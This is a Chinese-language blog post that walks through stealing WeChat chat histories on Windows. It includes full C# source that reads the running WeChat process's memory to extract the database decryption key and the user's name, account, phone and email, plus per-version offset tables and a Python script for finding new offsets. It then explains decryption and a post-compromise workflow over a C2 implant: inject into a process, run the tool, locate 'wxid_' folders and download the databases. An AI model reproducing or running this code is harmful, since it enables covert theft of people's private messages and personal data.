获取windows微信聊天记录(持续更新偏移地址)

background

昨天看到篇文章写的实战中各种密码凭证的获取，其中包括了钓鱼运维然后从微信中获取敏感信息。
这一直是我比较感兴趣的模块。在这之前微信聊天记录的数字化我只会聊天记录备份到模拟器然后再解密。说实话没啥太大的应用空间，不管是实战还是取证也好，这个手段都是不现实的。文章里写的手法是直接上windows，然后拿key解密数据库，这确实是一种高效实用的办法。

获取秘钥

微信聊天记录数据库存在了wxid_xxxxxxxxxx/msg/Multi/MSG*.db(数据库每达到270m就会生成一个新的，*就是数据库的编号)
引导文件是wxid_xxxxxxxxxx/msg/MicroMsg.db
我们要做的就是获取到数据库的秘钥，不同版本的windows微信偏移地址不一样。
C#编译成exe命令

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc test.cs

源代码

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

namespace WeChatGetKey
{
	internal class Program
	{
		private static void Main(string[] args)
		{
			try
			{
				Program.ReadTest();
			}
			catch (Exception ex)
			{
				Console.WriteLine("Error："+ ex.Message);
			}
			finally
			{
				//Console.ReadKey();
			}
			Console.WriteLine("[+] Done");
		}
		private static void ReadTest()
		{
			List<int> SupportList = null;
			Process WeChatProcess = null;
			foreach (Process ProcessesName in Process.GetProcessesByName("WeChat"))
			{
				WeChatProcess = ProcessesName;
				Console.WriteLine("[+] WeChatProcessPID: " + WeChatProcess.Id.ToString());
				foreach (object obj in WeChatProcess.Modules)
				{
					ProcessModule processModule = (ProcessModule)obj;
					if (processModule.ModuleName == "WeChatWin.dll")
					{
						Program.WeChatWinBaseAddress = processModule.BaseAddress;
						string FileVersion = processModule.FileVersionInfo.FileVersion;
						Console.WriteLine("[+] WeChatVersion: " + FileVersion);
						if (!Program.VersionList.TryGetValue(FileVersion, out SupportList))
						{
							Console.WriteLine("[-] WeChat Current Version Is: " + FileVersion + " Not Support");
							return;
						}
						break;
					}
				}
				if (SupportList == null)
				{
					Console.WriteLine("[-] WeChat Base Address Get Faild");
				}
				else
				{
					Int64 WeChatKey = (Int64)Program.WeChatWinBaseAddress + SupportList[4];
					string HexKey = Program.GetHex(WeChatProcess.Handle, (IntPtr)WeChatKey);
					if (string.IsNullOrWhiteSpace(HexKey))
					{
						Console.WriteLine("[-] WeChat Is Run, But Maybe No Login");
						return;
					}
					else
					{
						Int64 WeChatName = (Int64)Program.WeChatWinBaseAddress + SupportList[0];
						Console.WriteLine("[+] WeChatName: " + Program.GetName(WeChatProcess.Handle, (IntPtr)WeChatName, 100));
						Int64 WeChatAccount = (Int64)Program.WeChatWinBaseAddress + SupportList[1];
						string Account = Program.GetMobile(WeChatProcess.Handle, (IntPtr)WeChatAccount);
						if (string.IsNullOrWhiteSpace(Account))
						{
							Console.WriteLine("[-] WeChatAccount: Maybe User Is No Set Account");
						}
						else
						{
							Console.WriteLine("[+] WeChatAccount: " + Program.GetAccount(WeChatProcess.Handle, (IntPtr)WeChatAccount, 100));
						}
						Int64 WeChatMobile = (Int64)Program.WeChatWinBaseAddress + SupportList[2];
						string Mobile = Program.GetMobile(WeChatProcess.Handle, (IntPtr)WeChatMobile);
						if (string.IsNullOrWhiteSpace(Mobile))
						{
							Console.WriteLine("[-] WeChatMobile: Maybe User Is No Binding Mobile");
						}
						else
						{
							Console.WriteLine("[+] WeChatMobile: " + Program.GetMobile(WeChatProcess.Handle, (IntPtr)WeChatMobile, 100));
						}
						Int64 WeChatMail = (Int64)Program.WeChatWinBaseAddress + SupportList[3];
						string Mail = Program.GetMail(WeChatProcess.Handle, (IntPtr)WeChatMail);
						if (string.IsNullOrWhiteSpace(Mail) != false) { }
						else
						{
							Console.WriteLine("[+] WeChatMail: " + Program.GetMail(WeChatProcess.Handle, (IntPtr)WeChatMail, 100));
						}
						Console.WriteLine("[+] WeChatKey: " + HexKey);
					}
				}
			}
			if (WeChatProcess == null)
			{
				Console.WriteLine("[-] WeChat No Run");
				return;
			}
		}
		private static string GetName(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100)
		{
			byte[] array = new byte[nSize];
			if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0)
			{
				return "";
			}
			string text = "";
			foreach (char c in Encoding.UTF8.GetString(array))
			{
				if (c == '\0')
				{
					break;
				}
				text += c.ToString();
			}
			return text;
		}
		private static string GetAccount(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100)
		{
			byte[] array = new byte[nSize];
			if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0)
			{
				return "";
			}
			string text = "";
			foreach (char c in Encoding.UTF8.GetString(array))
			{
				if (c == '\0')
				{
					break;
				}
				text += c.ToString();
			}
			return text;
		}
		private static string GetMobile(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100)
		{
			byte[] array = new byte[nSize];
			if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0)
			{
				return "";
			}
			string text = "";
			foreach (char c in Encoding.UTF8.GetString(array))
			{
				if (c == '\0')
				{
					break;
				}
				text += c.ToString();
			}
			return text;
		}
		private static string GetMail(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100)
		{
			byte[] array = new byte[nSize];
			if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0)
			{
				return "";
			}
			string text = "";
			foreach (char c in Encoding.UTF8.GetString(array))
			{
				if (c == '\0')
				{
					break;
				}
				text += c.ToString();
			}
			return text;
		}
        //private static string GetHex(IntPtr hProcess, IntPtr lpBaseAddress)
        //{
        //    byte[] array = new byte[4];
        //    if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, 4, 0) == 0)
        //    {
        //        return "";
        //    }
        //    int num = 32;
        //    byte[] array2 = new byte[num];
        //    IntPtr lpBaseAddress2 = (IntPtr)(((int)array[3] << 24) + ((int)array[2] << 16) + ((int)array[1] << 8) + (int)array[0]);
        //    if (Program.ReadProcessMemory(hProcess, lpBaseAddress2, array2, num, 0) == 0)
        //    {
        //        return "";
        //    }
        //    return Program.bytes2hex(array2);
        //}
        private static string GetHex(IntPtr hProcess, IntPtr lpBaseAddress)
        {
            byte[] array = new byte[8];
            if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, 8, 0) == 0)
            {
                return "";
            }
            int num = 32;
            byte[] array2 = new byte[num];
            IntPtr lpBaseAddress2 = (IntPtr)(((long)array[7] << 56) + ((long)array[6] << 48) + ((long)array[5] << 40) + ((long)array[4] << 32) + ((long)array[3] << 24) + ((long)array[2] << 16) + ((long)array[1] << 8) + (long)array[0]);
            if (Program.ReadProcessMemory(hProcess, lpBaseAddress2, array2, num, 0) == 0)
            {
                return "";
            }
            return Program.bytes2hex(array2);
        }

		private static string bytes2hex(byte[] bytes)
		{
			return BitConverter.ToString(bytes, 0).Replace("-", string.Empty).ToLower().ToUpper();
		}
		[DllImport("kernel32.dll")]
		public static extern int OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
		[DllImport("kernel32.dll")]
		public static extern int GetModuleHandleA(string moduleName);
		[DllImport("kernel32.dll")]
		public static extern int ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, int lpNumberOfBytesRead);
		public static Dictionary<string, List<int>> VersionList = new Dictionary<string, List<int>>
		{
			{
				"3.2.1.154",
				new List<int>
				{
					328121948,
					328122328,
					328123056,
					328121976,
					328123020
				}
			},
			{
				"3.3.0.115",
				new List<int>
				{
					31323364,
					31323744,
					31324472,
					31323392,
					31324436
				}
			},
			{
				"3.3.0.84",
				new List<int>
				{
					31315212,
					31315592,
					31316320,
					31315240,
					31316284
				}
			},
			{
				"3.3.0.93",
				new List<int>
				{
					31323364,
					31323744,
					31324472,
					31323392,
					31324436
				}
			},
			{
				"3.3.5.34",
				new List<int>
				{
					30603028,
					30603408,
					30604120,
					30603056,
					30604100
				}
			},
			{
				"3.3.5.42",
				new List<int>
				{
					30603012,
					30603392,
					30604120,
					30603040,
					30604084
				}
			},
			{
				"3.3.5.46",
				new List<int>
				{
					30578372,
					30578752,
					30579480,
					30578400,
					30579444
				}
			},
			{
				"3.4.0.37",
				new List<int>
				{
					31608116,
					31608496,
					31609224,
					31608144,
					31609188
				}
			},
			{
				"3.4.0.38",
				new List<int>
				{
					31604044,
					31604424,
					31605152,
					31604072,
					31605116
				}
			},
			{
				"3.4.0.50",
				new List<int>
				{
					31688500,
					31688880,
					31689608,
					31688528,
					31689572
				}
			},
			{
				"3.4.0.54",
				new List<int>
				{
					31700852,
					31701248,
					31700920,
					31700880,
					31701924
				}
			},
			{
				"3.4.5.27",
				new List<int>
				{
					32133788,
					32134168,
					32134896,
					32133816,
					32134860
				}
			},
			{
				"3.4.5.45",
				new List<int>
				{
					32147012,
					32147392,
					32147064,
					32147040,
					32148084
				}
			},
			{
				"3.5.0.20",
				new List<int>
				{
					35494484,
					35494864,
					35494536,
					35494512,
					35495556
				}
			},
			{
				"3.5.0.29",
				new List<int>
				{
					35507980,
					35508360,
					35508032,
					35508008,
					35509052
				}
			},
			{
				"3.5.0.33",
				new List<int>
				{
					35512140,
					35512520,
					35512192,
					35512168,
					35513212
				}
			},
			{
				"3.5.0.39",
				new List<int>
				{
					35516236,
					35516616,
					35516288,
					35516264,
					35517308
				}
			},
			{
				"3.5.0.42",
				new List<int>
				{
					35512140,
					35512520,
					35512192,
					35512168,
					35513212
				}
			},
			{
				"3.5.0.44",
				new List<int>
				{
					35510836,
					35511216,
					35510896,
					35510864,
					35511908
				}
			},
			{
				"3.5.0.46",
				new List<int>
				{
					35506740,
					35507120,
					35506800,
					35506768,
					35507812
				}
			},
			{
				"3.6.0.18",
				new List<int>
				{
					35842996,
					35843376,
					35843048,
					35843024,
					35844068
				}
			},
			{
				"3.6.5.7",
				new List<int>
				{
					35864356,
					35864736,
					35864408,
					35864384,
					35865428
				}
			},
			{
				"3.6.5.16",
				new List<int>
				{
					35909428,
					35909808,
					35909480,
					35909456,
					35910500
				}
			},
			{
				"3.7.0.26",
				new List<int>
				{
					37105908,
					37106288,
					37105960,
					37105936,
					37106980
				}
			},
			{
				"3.7.0.29",
				new List<int>
				{
					37105908,
					37106288,
					37105960,
					37105936,
					37106980
				}
			},
			{
				"3.7.0.30",
				new List<int>
				{
					37118196,
					37118576,
					37118248,
					37118224,
					37119268
				}
			},
			{
				"3.7.5.11",
				new List<int>
				{
					37883280,
					37884088,
					37883136,
					37883008,
					37884052
				}
			},
			{
				"3.7.5.23",
				new List<int>
				{
					37895736,
					37896544,
					37895592,
					37883008,
					37896508
				}
			},
			{
				"3.7.5.27",
				new List<int>
				{
					37895736,
					37896544,
					37895592,
					37895464,
					37896508
				}
			},
			{
				"3.7.5.31",
				new List<int>
				{
					37903928,
					37904736,
					37903784,
					37903656,
					37904700
				}
			},
			{
				"3.7.6.24",
				new List<int>
				{
					38978840,
					38979648,
					38978696,
					38978604,
					38979612
				}
			},
			{
				"3.7.6.29",
				new List<int>
				{
					38986376,
					38987184,
					38986232,
					38986104,
					38987148
				}
			},
			{
				"3.7.6.44",
				new List<int>
				{
					39016520,
					39017328,
					39016376,
					38986104,
					39017292
				}
			},
			{
				"3.8.0.31",
				new List<int>
				{
					46064088,
					46064912,
					46063944,
					38986104,
					46064876
				}
			},
			{
				"3.8.0.33",
				new List<int>
				{
					46059992,
					46060816,
					46059848,
					38986104,
					46060780
				}
			},
			{
				"3.8.0.41",
				new List<int>
				{
					46064024,
					46064848,
					46063880,
					38986104,
					46064812
				}
			},
			{
				"3.8.1.26",
				new List<int>
				{
					46409448,
					46410272,
					46409304,
					38986104,
					46410236
				}
			},
			{
				"3.9.0.28",
				new List<int>
				{
					48418376,
					48419280,
					48418232,
					38986104,
					48419244
				}
			},
			{
				"3.9.2.23",
				new List<int>
				{
					50320784,
					50321712,
					50320640,
					38986104,
					50321676
				}
			},
			{
				"3.9.2.26",
				new List<int>
				{
					50329040,
					50329968,
					50328896,
					38986104,
					50329932
				}
			},
            {
                "3.9.5.91",
                new List<int>
                {
                    61654904,
                    61654680,
                    61654712,
                    38986104,
                    61656176
                }
             },
            {
                "3.9.6.19",
                new List<int>
                {
                    61997688,
                    61997464,
                    61997496,
                    38986104,
                    61998960
                }
            },
			{ "3.9.7.25",
                new List<int>
                {
                    63482760,
                    63484096,
                    63482568,
                    0,
                    63484032
                }
            
            },
			{ "3.9.7.29",
                new List<int>
                {
                    63486984,
                    63488320,
                    63486792,
                    0,
                    63488256
                }
            
            },
            { "3.9.6.33",
                new List<int>
                {
                    62030600,
                    62031936,
                    62030408,
                    38986104,
                    62031872
                }
            
            },
            { "3.9.8.11",
                new List<int>
                {
                    64996888,
                    64998224,
                    64996696,
                    0,
                    64998160
                }
            
            },
            { "3.9.8.15",
                new List<int>
                {
                    64996632,
                    64997968,
                    64996440,
                    0,
                    64997904
                }
            
            },
            { "3.9.8.25",
                new List<int>
                {
                    65000920,
                    65002256,
                    65000728,
                    0,
                    65002192
                }
            
            }
		};
		private static IntPtr WeChatWinBaseAddress = IntPtr.Zero;
	}
}

要是没有对应版本的偏移地址就去获取偏移地址
pip安装依赖环境

psutil
pycryptodome
pywin32

获取偏移地址源代码

# -*- coding: utf-8 -*-#
# -------------------------------------------------------------------------------
# Name:         get_base_addr.py
# Description:  
# Author:       xaoyaoo
# Date:         2023/08/22
# -------------------------------------------------------------------------------
import argparse
import ctypes
import json
import re

import psutil
import win32api


def hex2dec(hex):
    return int(hex, 16)


def dec2hex(dec):
    return hex(dec)


def hex_add(hex1, hex2, base1=16, base2=16):
    """
    两个任意进制数相加
    :param hex1:
    :param hex2:
    :return:
    """
    return hex(int(hex1, base1) + int(hex2, base2))


def hex_sub(hex1, hex2, base1=16, base2=16):
    """
    两个任意进制数相减
    :param hex1:
    :param hex2:
    :return:
    """
    return hex(int(hex1, base1) - int(hex2, base2))


def get_pid(keyword):
    """
    获取进程id
    :param keyword: 关键字
    :return:
    """
    pids = {}
    for proc in psutil.process_iter():
        if keyword in proc.name():
            pids[proc.pid] = proc
    return pids


class BaseAddr:
    def __init__(self, pid, proc_module_name="WeChatWin.dll"):
        self.pid = pid
        self.module_name = proc_module_name
        self.proc = psutil.Process(self.pid)
        self.version = self.get_app_version(self.proc.exe())
        self.base_address = 0
        self.end_address = 0
        self.batch = 0

        self.key_start_addr = 0
        self.key_end_addr = 0

        self.mobile_addr = []
        self.name_addr = []
        self.account_addr = []
        # self.key_addr = []

        self.get_base_addr()

    def get_app_version(self, executable_path):
        info = win32api.GetFileVersionInfo(executable_path, "\\")
        version = info['FileVersionMS'] >> 16, info['FileVersionMS'] & 0xFFFF, \
                  info['FileVersionLS'] >> 16, info['FileVersionLS'] & 0xFFFF
        version_str = ".".join(map(str, version))

        return version_str

    def get_base_addr(self):
        """
        获取模块基址
        :param pid: 进程id
        :param module_name: 模块名
        :return:
        """
        base_address = 0
        end_address = 0
        batch = 0
        n = 0
        for module in self.proc.memory_maps(grouped=False):
            if self.module_name in module.path:
                if n == 0:
                    base_address = int(module.addr, 16)
                    batch = module.rss
                n += 1
                end_address = int(module.addr, 16) + module.rss

        self.base_address = base_address
        self.end_address = end_address
        self.batch = batch
        # self.batch = end_address - base_address

    def find_all(self, c, string):
        """
        查找字符串中所有子串的位置
        :param c: 子串 b'123'
        :param string: 字符串 b'123456789123'
        :return:
        """
        return [m.start() for m in re.finditer(re.escape(c), string)]

    # 搜索内存地址范围内的值
    def search_memory_value(self, mobile, name, account):
        mobile = mobile.encode("utf-8")
        name = name.encode("utf-8")
        account = account.encode("utf-8")

        Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, self.pid)

        mobile_addr = []
        name_addr = []
        account_addr = []

        array = ctypes.create_string_buffer(self.batch)
        for i in range(self.base_address, self.end_address, self.batch):
            if ctypes.windll.kernel32.ReadProcessMemory(Handle, ctypes.c_void_p(i), array, self.batch, None) == 0:
                continue

            hex_string = array.raw  # 读取到的内存数据

            if mobile in hex_string:
                mobile_addr = mobile_addr + [m.start() + i for m in re.finditer(re.escape(mobile), hex_string)]
            if name in hex_string:
                name_addr = name_addr + [m.start() + i for m in re.finditer(re.escape(name), hex_string)]
            if account in hex_string:
                account_addr = account_addr + [m.start() + i for m in re.finditer(re.escape(account), hex_string)]

        self.mobile_addr = mobile_addr
        self.name_addr = name_addr
        self.account_addr = account_addr
        return mobile_addr, name_addr, account_addr

    def get_key_addr(self, key):
        """
        获取key的地址
        :param key:
        :return:
        """
        key = bytes.fromhex(key)

        module_start_addr = 34199871460642
        module_end_addr = 0
        for module in self.proc.memory_maps(grouped=False):
            if "WeChat" in module.path:
                start_addr = int(module.addr, 16)
                end_addr = start_addr + module.rss

                if module_start_addr > start_addr:
                    module_start_addr = start_addr
                if module_end_addr < end_addr:
                    module_end_addr = end_addr

        Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, self.pid)
        array = ctypes.create_string_buffer(self.batch)

        for i in range(module_start_addr, module_end_addr, self.batch):
            if ctypes.windll.kernel32.ReadProcessMemory(Handle, ctypes.c_void_p(i), array, self.batch, None) == 0:
                continue

            hex_string = array.raw  # 读取到的内存数据
            if key in hex_string:
                self.key_addr_tmp = i + hex_string.find(key)
                break

        array_key = []
        for i in range(8):
            byte_value = (self.key_addr_tmp >> (i * 8)) & 0xFF
            hex_string = format(byte_value, '02x')
            byte_obj = bytes.fromhex(hex_string)
            array_key.append(byte_obj)
        # 合并数组
        array_key = b''.join(array_key)

        array = ctypes.create_string_buffer(self.batch)
        for i in range(self.base_address, self.end_address, self.batch):
            if ctypes.windll.kernel32.ReadProcessMemory(Handle, ctypes.c_void_p(i), array, self.batch, None) == 0:
                continue

            hex_string = array.raw  # 读取到的内存数据
            if array_key in hex_string:
                self.key_addr = i + hex_string.find(array_key)
                return self.key_addr

    def calculate_offset(self, addr):
        """
        计算偏移量
        :param addr:
        :return:
        """
        offset = addr - self.base_address
        return offset

    def get_offset(self):
        """
        计算偏移量
        :param addr:
        :return:
        """
        mobile_offset = 0
        name_offset = 0
        account_offset = 0
        key_offset = 0
        if len(self.mobile_addr) >= 1:
            mobile_offset = self.calculate_offset(self.mobile_addr[0])
        if len(self.name_addr) >= 1:
            name_offset = self.calculate_offset(self.name_addr[0])
        if len(self.account_addr) >= 1:
            if len(self.account_addr) >= 2:
                account_offset = self.calculate_offset(self.account_addr[1])
            else:
                account_offset = self.calculate_offset(self.account_addr[0])

        key_offset = self.calculate_offset(self.key_addr)

        self.key_offset = key_offset
        self.mobile_offset = mobile_offset
        self.name_offset = name_offset
        self.account_offset = account_offset
        return name_offset, account_offset, mobile_offset, 0, key_offset


def run(mobile, name, account, key):
    proc_name = "WeChat.exe"
    proc_module_name = "WeChatWin.dll"

    pids = get_pid(proc_name)
    for pid, proc in pids.items():
        ba = BaseAddr(pid, proc_module_name)
        ba.search_memory_value(mobile, name, account)
        ba.get_key_addr(key)
        name_offset, account_offset, mobile_offset, _, key_offset = ba.get_offset()
        rdata = {ba.version: [name_offset, account_offset, mobile_offset, 0, key_offset]}
        return rdata


if __name__ == '__main__':
    # 创建命令行参数解析器
    parser = argparse.ArgumentParser()
    parser.add_argument("--mobile", type=str, help="手机号")
    parser.add_argument("--name", type=str, help="微信昵称")
    parser.add_argument("--account", type=str, help="微信账号")
    parser.add_argument("--key", type=str, help="密钥")

    # 解析命令行参数
    args = parser.parse_args()

    # 检查是否缺少必要参数，并抛出错误
    if not args.mobile or not args.name or not args.account or not args.key:
        raise ValueError("缺少必要的命令行参数！请提供手机号、微信昵称、微信账号和密钥。")

    # 从命令行参数获取值
    mobile = args.mobile
    name = args.name
    account = args.account
    key = args.key

    # 调用 run 函数，并传入参数
    rdata = run(mobile, name, account, key)
    print(rdata)

    # 添加到version_list.json
    with open("version_list.json", "r", encoding="utf-8") as f:
        data = json.load(f)
        data.update(rdata)
    with open("version_list.json", "w", encoding="utf-8") as f:
        json.dump(data, f, ensure_ascii=False, indent=4)

用法

python get_base_addr.py  --mobile 手机号 --name 微信名称 --account 微信号 --key 微信的key

将获取到的偏移地址补充到上面的C#代码中即可(这里要保存好自己的key，方便版本更新时直接用key来找偏移地址，也可以纯手找偏移地址，但是我感觉研究那些底层的东西对我的帮助不大，有现成的东西直接用就好了)

运行C#编译的程序自动获取微信的key

解密

https://github.com/Ormicron/chatViewTool
新建文件夹里面创建个DBPass.Bin文件，内容是获取到的key，相同目录下放入上面提到的MSG*.db和MicroMsg.db文件。选择数据库解密，然后软件会卡住无响应，等他解密完就好了。

解密完成选择查看即可

双击即可可视化展示，13万条记录，哈哈哈哈，这大概就是我的青春吧，小熊是个坏东西！

实战场景模拟

上线了先注入个进程再设置好回连时间
把获取key的工具传上去运行，不要start，直接输入文件的绝对路径就行了

找微信的路径(可以先在C2上列出目标磁盘再一个一个检索)

dir /s /b c: | findstr "wxid_"

下载文件,下到本地，按上面的手法解密即可

2023年10月7日13:10:13更新

突然想起来这种手法还算不上完美，仅仅只能看文字信息，我看了数据库里面的图片这些信息都是个xml，里面写了cdnkey之类的东西，我感觉用这些东西是可以直接找到原始图片文件的，但是不知道怎么操作。网上找了一大圈都没有发现解决办法，自己抓包看了下图片根本不走http请求，用wireshark感觉是tcp传输的文件，请求包都是乱码，但是发现了一些fileid之类的字眼。没办法，搞不出来。 m